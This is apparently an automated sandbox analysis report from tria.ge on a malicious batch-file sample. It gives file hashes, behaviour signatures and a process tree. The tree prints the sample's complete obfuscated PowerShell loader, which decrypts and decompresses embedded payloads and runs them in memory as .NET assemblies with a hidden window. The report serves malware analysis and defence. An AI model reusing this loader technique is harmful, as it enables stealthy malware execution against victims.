Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
23/08/2024, 02:30
Static task
static1
Behavioral task
behavioral1
Sample
ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat
Resource
win10v2004-20240802-en
General
-
Target
ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat
-
Size
275KB
-
MD5
536ac91b5fe6a53fd85f5d7b609dc591
-
SHA1
5fb565c1bec3e386642e921c34ea365fbcb07127
-
SHA256
ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9
-
SHA512
b47aeba5a1abdcd8b1b6ba67663fb199fca22a21c1417aa830d042268f6c810b9abf246b964d7dc76497b009f8d54e77c1b0f38e5c775097b9fa15dbd19b748f
-
SSDEEP
6144:h1E5NlqQRcu+pHfFQS7w1bUyntarmxcGqKxH1279F:h1E5qz9H9T7w1bUotqgRH+
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2460 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2460 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3036 wrote to memory of 2344 3036 cmd.exe 32 PID 3036 wrote to memory of 2344 3036 cmd.exe 32 PID 3036 wrote to memory of 2344 3036 cmd.exe 32 PID 2344 wrote to memory of 2328 2344 net.exe 33 PID 2344 wrote to memory of 2328 2344 net.exe 33 PID 2344 wrote to memory of 2328 2344 net.exe 33 PID 3036 wrote to memory of 2460 3036 cmd.exe 34 PID 3036 wrote to memory of 2460 3036 cmd.exe 34 PID 3036 wrote to memory of 2460 3036 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2328
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\Admin\AppData\Local\Temp\ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-